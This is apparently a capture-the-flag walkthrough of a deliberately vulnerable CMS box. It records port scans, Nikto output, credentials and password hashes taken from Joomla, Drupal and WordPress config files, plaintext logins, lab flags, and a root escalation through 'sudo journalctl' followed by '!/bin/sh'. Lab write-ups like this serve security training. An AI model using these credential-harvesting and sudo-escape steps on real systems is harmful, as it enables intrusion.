Since we're doing a black box testing, we'll have to scan our network for the box
I used RustScan with a list of IPs and I found `192.168.1.34`

# NMAP SCAN
```nmap
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.14.0 (Ubuntu)
5000/tcp open  http    nginx 1.14.0 (Ubuntu)
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
9001/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Web(Port 80)
## Findings
* robots.txt disallows home.html and about.html
* Nginx 1.14.0


# Web(Port 5000)
## Findings
* Wordpress 5.7.2
* PHP
* MySQL
### Nikto
```txt
+ Uncommon header 'link' found, with contents: <http://fsociety.web:5000/wp-json/>; rel="https://api.w.org/"
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found

```

# Web(Port 8081)
## Findings
* Wordpress 5.7.2
* PHP
* Joomla
I was able to login as admin using credentials(Refer Movement,Pivoting,Persistence)
```txt
joomlaCMS_admin:_q4gWWJuBWt8cqfbUm-cdevR?L@N7-pR
```

# Web(Port 9001)
## Findings
* Wordpress 5.7.2
* PHP
* MySQL
* Joomla
* Drupal 7
* 
### Nikto
```txt
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
```
### .gitignore
```txt
# Ignore configuration files that may contain sensitive information.
sites/*/settings*.php

# Ignore paths that contain user-generated content.
sites/*/files
sites/*/private
```
### Drupal 7
* Current version is 9.1.6
* Total of 15 exploits for Drupal 7, famous one is Drupalgeddon2
* Target is vulnerable, able to perform RCE (**CRITICAL**)


# Moving,Pivoting and Persistence
* Attacker not able to upload into /var/www/html
* Found potential credentials in /var/www/html/joomla/configuration.php
```php
public $user = 'joomla_admin';
        public $password = 'j00m1_@_dBpA$$';
        public $db = 'joomla_db';
        public $dbprefix = 'hs23w_';
        public $live_site = '';
        public $secret = 'E2WM78yuyqAzib9N';
```
* MySQL database for Joomla is accessable.
* Able to read users tables
```txt
joomlaCMS_admin:$2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWee
elliot:$2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy
```
* Hash is bcrypt (fuck)

* Found potential credentials in /var/www/html/drupal/sites/
```php                                                                                                                                               
      'database' => 'drupal_db',                                                                                                                                                                                                              
      'username' => 'drupal_admin',                                                                                                                                                                                                           
      'password' => 'p@$$_C!rUP@!_cM5',                                                                                                                            
```
* Able to read users table
```txt
admin_cms_drupal:$S$DADmuahqIEcfhp8mqTQ/ystjAyQdBA46h/VXbd89wutU4aKRmNpi
```
* Hash type is drupal 7
* Readable hidden interesting files
```bash
-rw-r--r-- 1 root root 2319 Apr  4  2018 /etc/bash.bashrc                                                                                                                                                                                     
-rw-r--r-- 1 root root 3771 Apr  4  2018 /etc/skel/.bashrc                                                                                                                                                                                    
-rw-r--r-- 1 root root 807 Apr  4  2018 /etc/skel/.profile                                                                                                                                                                               
-rw-r--r-- 1 ghost root 3771 Apr  4  2018 /home/ghost/.bashrc                                                                                                                                                                                 
-rw-r--r-- 1 ghost root 807 Apr  4  2018 /home/ghost/.profile                                                                                                                                                                                 
-rw-r--r-- 1 ghost root 0 May 28 12:19 /home/ghost/.sudo_as_admin_successful                                                                                                                                                                  
-rw-r--r-- 1 tyrell tyrell 0 May 31 10:54 /home/tyrell/.sudo_as_admin_successful                                                                                                                                                              
-rw-r--r-- 1 root root 3106 Sep 27  2019 /usr/share/base-files/dot.bashrc                                                                                                                                                                     
-rw-r--r-- 1 root root 2889 Dec  4  2017 /usr/share/byobu/profiles/bashrc                                                                                                                                                                     
-rw-r--r-- 1 root root 2778 Aug 13  2017 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc                                                                                                                              
-rw-r--r-- 1 root root 802 Aug 13  2017 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc 
```
* Wordpress wp-config.php files
```bash
/var/www/html/wordpress/public_html/wp-config.php                                                                                                                                                                                             
define( 'DB_NAME', 'wordpress_db' );                                                                                                                                                                                                          
define( 'DB_USER', 'wp_admin' );                                                                                                                                                                                                              
define( 'DB_PASSWORD', 'UUs3R_C!B@p@55' );                                                                                                                                                                                                    
define( 'DB_HOST', 'localhost' );
```
* Potential credentials
```txt
wordpress_admin:$P$ByXz8klWHk6kmTctrN/8vfzXGqLfab/
```
* Potential credentials in /opt/8081.cred
```txt
Username: joomlaCMS_admin
Password: _q4gWWJuBWt8cqfbUm-cdevR?L@N7-pR
```
* Login as user elliot using his email
```txt
elliot:5T3e!_M0un7i@N
```
* Found user.txt
```txt
9046628504775551
```
# Privesc
* User elliot cannot run sudo, need to change user or find SUID bit.
* linpeas output
 
```bash
+] SUID - Check easy privesc, exploits and write perms                                                                                                                                                                                       
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                                                                                                                                 
-rwsr-xr-x 1 root   root        31K Aug 11  2016 /bin/fusermount                                                                                                                                                                              
-rwsr-xr-x 1 root   root        10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device                                                                                                                                                            
-rwsr-sr-x 1 daemon daemon      51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                                                                                           
-rwsr-xr-x 1 root   root        99K Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic                                                                                                                                                   
-rwsr-xr-x 1 root   root        59K Mar 22  2019 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                               
-rwsr-xr-x 1 root   root        37K Mar 22  2019 /usr/bin/newuidmap                                                                                                                                                                           
-rwsr-xr-x 1 root   root        40K Mar 22  2019 /usr/bin/newgrp  --->  HP-UX_10.20                                                                                                                                                           
-rwsr-xr-x 1 root   root        37K Mar 22  2019 /usr/bin/newgidmap                                                                                                                                                                           
-rwsr-xr-x 1 root   root        75K Mar 22  2019 /usr/bin/gpasswd                                                                                                                                                                             
-rwsr-xr-x 1 root   root        44K Mar 22  2019 /usr/bin/chsh                                                                                                                                                                                
-rwsr-xr-x 1 root   root        75K Mar 22  2019 /usr/bin/chfn  --->  SuSE_9.3/10                                                                                                                                                             
-rwsr-xr-x 1 root   root        44K Mar 22  2019 /bin/su                                                                                                                                                                                      
-rwsr-xr-x 1 root   root        14K Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1                                                                                                                                                   
-rwsr-xr-x 1 root   root        22K Mar 27  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)                                                                                                             
-rwsr-xr-x 1 root   root        19K Jun 28  2019 /usr/bin/traceroute6.iputils                                                                                                                                                                 
-rwsr-xr-x 1 root   root        22K Jun 28  2019 /usr/bin/arping                                                                                                                                                                              
-rwsr-xr-x 1 root   root        63K Jun 28  2019 /bin/ping                                                                                                                                                                                    
-rwsr-xr-- 1 root   messagebus  42K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                                                                  
-rwsr-xr-- 1 root   dip        370K Jul 23  2020 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)                                                                                                                                          
-rwsr-xr-x 1 root   root        27K Sep 16  2020 /bin/umount  --->  BSD/Linux(08-1996)                                                                                                                                                        
-rwsr-xr-x 1 root   root        43K Sep 16  2020 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                              
-rwsr-xr-x 1 root   root       146K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable                                                                                                                                 
-rwsr-xr-x 1 root   root       111K Feb  2  2021 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
```
* One file stands out
`/var/www/html/drupal/misc/tyrell.pass:Username: tyrell`
* Potential credentials
`Username: tyrell
Password: mR_R0bo7_i5_R3@!_`

* We can now SSH as user tyrrel
* Checking out sudo -l
`User tyrell may run the following commands on vuln_cms:
    (root) NOPASSWD: /bin/journalctl`

Checking out GTFObins
```
sudo journalctl
!/bin/sh
```
We are now root, root.txt
```bash
#cat root.txt
4359537020406305
```




